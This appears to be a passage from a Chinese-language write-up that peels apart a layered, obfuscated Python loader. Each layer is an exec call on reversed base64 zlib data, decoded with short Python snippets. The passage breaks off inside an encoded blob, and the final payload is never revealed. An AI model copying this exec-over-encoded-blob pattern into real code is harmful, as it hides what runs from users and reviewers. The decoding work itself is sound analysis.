2iJl8U3WjyB68Rq4HATk/cK7LkJHHMjC3W7dTmOBpfoWMVELaL+RkqWYv0CpW5qENLlnOPBrGaGNeIZahzbnruEPIIXGkGz1fE5d42MaKZsCUYt1xXiai9+cbKGj/d0lICq7uc7bRhEBx46DyBXTz1gfJnT2ur6x4Avb5wY2pcYrcD2OR6AikMvm2c0bhabJB6o0DhONJ4lCxmKdGBzuwrts1u0D2yuo37yLLfsGDuyepNw8lyTNc2nyhCVBfW23DnBQmWc1QLCoRppVhjKXwOpODKO8R8YHnQM+rLk6EOabCdGK57iRzMcT3wc436kVmHXDcI0ZsYGY5aIC5DbdWjUt2ZuU0LmuLwzCTS99zhOoO8DKNqbK4bINLyAI2X928xib+hmIOqp3oSgC2PdFc8yqthN9S55omtex2xkEe8CY48C6z4JtqVtqhPQWQ8kte6xlepiVYCqIbE2Vg4fN//L/ff/u//9p4Lz7uq46yWenkJ/x90j/5mEIors5McSuFi9dygyyR5wJfuqGhOfsVVwJe'
decoded = zlib.decompress(base64.b64decode(payload[::-1]))
print(decoded.decode('utf-8'))

得到

1
exec((_)(b'=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'))

继续解码

1
2
3
4
5
6
7
import zlib
import base64

payload = b'=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'

decoded_code = zlib.decompress(base64.b64decode(payload[::-1]))
print(decoded_code.decode('utf-8'))

得到

1
exec((_)(b'==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'))

解码

1
2
3
4
5
6
7
import zlib
import base64

payload = b'==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'

decoded = zlib.decompress(base64.b64decode(payload[::-1]))
print(decoded.decode('utf-8'))

得到

1
exec((_)(b'4iby6fw/fff+/TZrG/A6n9TbhtdgedAn1vnr3iehuhbMxwoFVdFehaBVdJBDLi724DwPCiwOi6g3AHipBNJNL20AS7dneoBxk1f6E1OOPM15UKPhCBDZKscrYJsyhPr4A6sJpV5Q8glSoIITVi+UGThwWCz2VjzBLu0WGpEYugizogzry+sNp7NUi39LV7yUulMva3evYFwcpXAo3bbpFpuTKJaGNRQLLRbM1d3Q0CE9iESi1+guE+4A/sOQS256WCY6z5YcRAxo82NM+vQitVf7mCIFFXovlUGR2dDA24QXpBfqJOB91EF+8hC3T5GSlf+sOCslL00UwTOjOtQ+jDo8DGgcQsBb0HI7d9GA6P5HyzxLjaI0X4VsYtzYF62+Bey3qwI7hL349rnAG2ljO6YHwgjFfkSRQabpYEdNF1y90P314LFtUDgHk/vCVCUzE4YRwuKDtvFImE+i05o4+nPbBgMR+EJ6yU1jXz2oevENJ8DqhbeWM4SEd3LVL3yOrIPgWptzPGnUBFRTXojbZW1fvEnNwlcqtKC2SocSGW9H17i2f845D4Td1nZBnmHT/lsCYnvEXxVwzQVUGrYsuQTMs94xtN97F3TEIH996901yraCFDyOK3mhVMGJFG94AJBBWW07VQImOET4TWDvnYcI377IxMx0vNf4/vluxuNGIhzMqlIi1Pw9RSDMpnCUae5XSTrO+Tfm80OtiHp31Nl+yJOr8o8xla2Oln3W2YI7eq8KWGoSn5dWKrfzSgrMWXTkpoOM1sBdqDmdALKdqjYN7eP22LPjj0hQkhJzzoGR7cvKKQpdaAcHKfkFa5aDq1+P/qL+O0ktq8EnM7w7as27LHQ7GL7ko/kYvIPxukGdPx4XUzn+ao5KS5JOXeoW68B5A35HkQ3/XC24WMxtTvphlBFeqb5fo89mVvjKgT8qAwMbOGfK65Mn/IIRNtCS8wXYU+JoQ/LfXXizDaCcEjonZ4Nu5rwUxVqs4Go7YEmTA6Xv/7HJEQui5Js6zV4VkvaH/qTPmy32FPKM0hlw4KqGlIif27+dcu1M+b9BFqg+MYiKGU6yrnrQZTapf6BElCdzodsf/L9EdFlQyTlQcSHPnleMAfPXoDH0ONtcfY5UDCSvaydQVz+Tm2jo33XEIGNG04NqPC6FgSyOtbNJfoXHSczUJEJlaZrfTMS673GEJUHBf4w5PaKIA7NjuX1h6h4FUbAuN5ibuyApYgqrKgO4cBIaG0SieI7A0P31Z5zz0ovzVJE0FmNRxjClveQ/XsxSQtDFosaOuFHxsjm6PdFyZiTahNWmf5LF7YSu8JH6nRYaodHV5iPHO3EdW9UzuYx0yZ3tx/elgs23gNfalwRNWv4yb2MeJZTcBZCS5Up6/pRe3J/2b+ZTLmQwMD4+0IZKWXkzMESX0QaBq+Csrrx8CV3LZPY6299N2JXLGKAZtMbJrHF9e/xBAEBEAFsc51aVdHO8jSqusCZmd/iEqzuw1vrH90N/d9zDVGpSIvtBTzh3FtlZGH/eoRtXFazv1tMPaQrV3YcH2XkR+pFup++O96ZZR87Aws7Bf2yLKa7tWoMlBiQXiNrRqmFLCecnV3Un5kKoAXLzFST16yHFtaCQEUaB3CvIdA6r09NK80OA1p7R90M4U7ybXedZFcNJ3Md4pFNj0y7ZMApp1NyEm3LPhSZh4panfHR5KW9BGOSWYB9NLWDCDWNNa4VLdZenURheicdHZzkVyaixBMf7NRlVhntSlTuT1Q9U+V4owhUh75SfYEKJC7S9pY+vyVsq//tHU5GsFZwOr6Whlsa+jf+nevChveOxUrD0g1YRLtFsaFuWHRuHL6+Ywi4uoqx0LCt9h/KmXXFVi6eTFKjiC4C63nE+APQYmbdTEulb5bcrnOGdkOYlhp+4nQAGE+6lrs6L8+9LifLjLP7Z1XhZxhcHCJFbx3CEo0YxxcgPCeJ7IiyEl38o0go6MfmAJ25kLa4UwJkq7FT4RU5lf/gJ1oPOO+rJnzvnECHiEOjxqy+gXg9iBv4M8B8qI5koyGDB6RAzZBA0smPKRX0DTzWNMvfcQXUas4/E8Mc+J8VT+VdJEV8C20CDbQGvgccEgDMhBSGpOlaGV7n/7ZMogYKHm7t4g7yut+3AjrJWdsn3CPTR1LYaN0ZR1bCI0shBM4rf/lL+DAfC8NPbYp9XXXWW1PpQ63LdWR0BfWW6wrTZPsvRqDCIGk3vxiqS1CrW9UO3ZhgpTLFDs5GaJkBrk7K+Ya6k5f4W9Q7Q9PZXwgHLLH0Yiy6xapD6MF9/kSnPiUmFxr+p/VU0LJLNk4ctueQbkpi1XZX9tejQybyDf2Om2uQdBFwMwg/GBpZjwOZbDxkn4NzYishKnRryRJsM7WqEOWSxVLWPHLJO5pZDMqwaPGl7CdGK9SAdtRS1NOlYJcGMf9Gmj8ckIp8syM4h5HQ+kSZG+TTJKfgBFcJ1y/2BjFKRDxddmKa6AVRiECIVSZQpmtttVB0dxOjMQMrXMuSL0R652hsuw2V0cGnWPiucsnouOTVXMCR1wOn7ebzQA4U9hOqDXMuWCC/a6E/RTwNxV4mRBWgmYIG+3/0qGZhzgMocF2m6+dejIwbCbB7suGjtY8Ck7u9GRBl0btT6TsZi7Da9EkAnsBWn6ti7CmVDHC+4BzhUwFd9ZBcVmhwbIwUcLWXrlLzPAWAbSX+shk5urkfvbepumM2cUWVEFwyLmZWsLbv8TTq8wvMXIweLsZvIHfz9pSWOgNKuYlKqCQegx62bh8oBDy